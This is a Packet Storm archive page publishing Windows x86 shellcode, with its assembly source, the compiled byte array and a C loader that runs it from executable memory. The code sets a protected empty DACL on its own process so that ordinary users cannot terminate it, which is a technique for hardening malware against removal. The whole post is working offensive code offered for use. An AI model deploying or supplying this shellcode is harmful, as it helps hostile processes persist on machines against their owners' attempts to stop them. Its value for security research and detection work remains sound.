what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Windows x86 Protect Process Shellcode

Windows x86 Protect Process Shellcode
Posted Feb 17, 2017
Authored by Ege Balci

229 bytes small Windows x86 protect process shellcode.

tags | x86, shellcode
systems | windows
SHA-256 | b8fe8bc29e25d0326cace2297fc1684495e84eb4288f471a99b735848293e156

Windows x86 Protect Process Shellcode

Change Mirror Download
/*

# Win32 - Protect Process Shellcode
# Date: [17.02.2017]
# Author: [Ege BalcA+-]
# Tested on: [Win 7/8/8.1/10]

This shellcode sets the SE_DACL_PROTECTED flag inside security descriptor structure,
this will prevent the process being terminated by non administrative users.

-----------------------------------------------------------------

[BITS 32]
[ORG 0]

; EAX-> Return Values
; EBX-> Process Handle
; EBP-> API Block
; ESI-> Saved ESP

pushad ; Save all registers to stack
pushfd ; Save all flags to stack

push esp ; Push the current esp value
pop esi ; Save the current esp value to ecx

cld ; Clear direction flags
call Start

%include "API-BLOCK.asm"; Stephen Fewer's hash API from metasploit project

Start:
pop ebp ; Pop the address of SFHA

push 0x62C64749 ; hash(kernel32.dll, GetCurrentProcessId())
call ebp ; GetCurrentProcessId()

push eax ; Process ID
push 0x00000000 ; FALSE
push 0x1F0FFF ; PROCESS_ALL_ACCESS
push 0x50B695EE ; hash(kernel32.dll, OpenProcess)
call ebp ; OpenProcess(PROCESS_ALL_ACCESS,FALSE,ECX)
mov ebx, eax ; Move process handle to ebx


push 0x00000000 ; 0,0
push 0x32336970 ; pi32
push 0x61766461 ; adva
push esp ; Push the address of "advapi32" string
push 0x0726774C ; hash(kernel32.dll, LoadLibraryA)
call ebp ; LoadLibraryA("advapi32")

push 0x00503a44 ; "D:P"
sub esp,4 ; Push the address of "D:P" string to stack

push 0x00000000 ; FALSE
lea eax, [esp+4] ; Load the address of 4 byte buffer to EAX
push eax ; Push the 4 byte buffer address
push 0x00000001 ; SDDL_REVISION_1
lea eax, [esp+16] ; Load the address of "D:P" string to EAX
push eax ; Push the EAX value
push 0xDA6F639A ; hash(advapi32.dll, ConvertStringSecurityDescriptorToSecurityDescriptor)
call ebp ; ConvertStringSecurityDescriptorToSecurityDescriptor("D:P",SDDL_REVISION_1,FALSE)

push 0x00000004 ; DACL_SECURITY_INFORMATION
push ebx ; Process Handle
push 0xD63AF8DB ; hash(kernel32.dll, SetKernelObjectSecurity)
call ebp ; SetKernelObjectSecurity(ProcessHandle,DACL_SECURITY_INFORMATION,SecurityDescriptor)

mov esp,esi ; Restore the address of esp
popad ; Popback all registers
popfd ; Popback all flags
ret ; Return


*/


//>Special thanks to Yusuf Arslan Polat ;D
#include <windows.h>
#include <stdio.h>

unsigned char Shellcode[] = {
0x60, 0x9c, 0x54, 0x5e, 0xfc, 0xe8, 0x82, 0x00, 0x00, 0x00, 0x60, 0x89,
0xe5, 0x31, 0xc0, 0x64, 0x8b, 0x50, 0x30, 0x8b, 0x52, 0x0c, 0x8b, 0x52,
0x14, 0x8b, 0x72, 0x28, 0x0f, 0xb7, 0x4a, 0x26, 0x31, 0xff, 0xac, 0x3c,
0x61, 0x7c, 0x02, 0x2c, 0x20, 0xc1, 0xcf, 0x0d, 0x01, 0xc7, 0xe2, 0xf2,
0x52, 0x57, 0x8b, 0x52, 0x10, 0x8b, 0x4a, 0x3c, 0x8b, 0x4c, 0x11, 0x78,
0xe3, 0x48, 0x01, 0xd1, 0x51, 0x8b, 0x59, 0x20, 0x01, 0xd3, 0x8b, 0x49,
0x18, 0xe3, 0x3a, 0x49, 0x8b, 0x34, 0x8b, 0x01, 0xd6, 0x31, 0xff, 0xac,
0xc1, 0xcf, 0x0d, 0x01, 0xc7, 0x38, 0xe0, 0x75, 0xf6, 0x03, 0x7d, 0xf8,
0x3b, 0x7d, 0x24, 0x75, 0xe4, 0x58, 0x8b, 0x58, 0x24, 0x01, 0xd3, 0x66,
0x8b, 0x0c, 0x4b, 0x8b, 0x58, 0x1c, 0x01, 0xd3, 0x8b, 0x04, 0x8b, 0x01,
0xd0, 0x89, 0x44, 0x24, 0x24, 0x5b, 0x5b, 0x61, 0x59, 0x5a, 0x51, 0xff,
0xe0, 0x5f, 0x5f, 0x5a, 0x8b, 0x12, 0xeb, 0x8d, 0x5d, 0x68, 0x49, 0x47,
0xc6, 0x62, 0xff, 0xd5, 0x50, 0x6a, 0x00, 0x68, 0xff, 0x0f, 0x1f, 0x00,
0x68, 0xee, 0x95, 0xb6, 0x50, 0xff, 0xd5, 0x89, 0xc3, 0x6a, 0x00, 0x68,
0x70, 0x69, 0x33, 0x32, 0x68, 0x61, 0x64, 0x76, 0x61, 0x54, 0x68, 0x4c,
0x77, 0x26, 0x07, 0xff, 0xd5, 0x68, 0x44, 0x3a, 0x50, 0x00, 0x83, 0xec,
0x04, 0x6a, 0x00, 0x8d, 0x44, 0x24, 0x04, 0x50, 0x6a, 0x01, 0x8d, 0x44,
0x24, 0x10, 0x50, 0x68, 0x9a, 0x63, 0x6f, 0xda, 0xff, 0xd5, 0x6a, 0x04,
0x53, 0x68, 0xdb, 0xf8, 0x3a, 0xd6, 0xff, 0xd5, 0x89, 0xf4, 0x61, 0x9d,
0xc3
};



int main(int argc, char const *argv[])
{
char* BUFFER = (char*)VirtualAlloc(NULL, sizeof(Shellcode), MEM_COMMIT, PAGE_EXECUTE_READWRITE);
memcpy(BUFFER, Shellcode, sizeof(Shellcode));
(*(void(*)())BUFFER)();

printf("This process is protected !");
getchar();

return 0;
}

Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close